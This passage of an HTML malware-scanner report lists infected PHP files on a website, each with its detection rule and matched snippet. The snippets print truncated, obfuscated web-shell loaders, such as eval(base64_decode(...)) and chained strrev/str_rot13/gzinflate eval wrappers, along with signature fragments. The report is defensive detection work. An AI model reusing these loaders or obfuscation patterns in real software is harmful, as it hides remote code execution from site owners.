</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_131").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wlihh.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:14:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:14:25</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_132" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_132").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ovaqxqmrl.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 20:11:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 20:11:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_133" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $LNuWx = '</span><span style="color: #0000BB">gzinflate</span><span style="color: #DD0000">'; $sJhXG = '</span><span style="color: #0000BB">str_rot13</span><span style="color: #DD0000">'; $Shgrt = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; echo '</span><span style="color: #007700"><</span><span style="color: #0000BB">br</span><span style="color: #007700">> </span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); eval($Shgrt($sJhXG($LNuWx($DesQW('</span><span style="color: #0000BB">rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf</span><span style="color: #007700">/</span><span style="color: #0000BB">h7yy8iIOHH</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$Shgrt</span><span style="color: #007700">(</span><span style="color: #0000BB">$sJhXG</span><span style="color: #007700">(</span><span style="color: #0000BB">$LNuWx</span><span style="color: #007700">(</span><span style="color: #0000BB">$DesQW</span><span style="color: #007700">(</span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RinY</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_133").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/yazrz.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 13:12:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 13:12:59</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_134" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
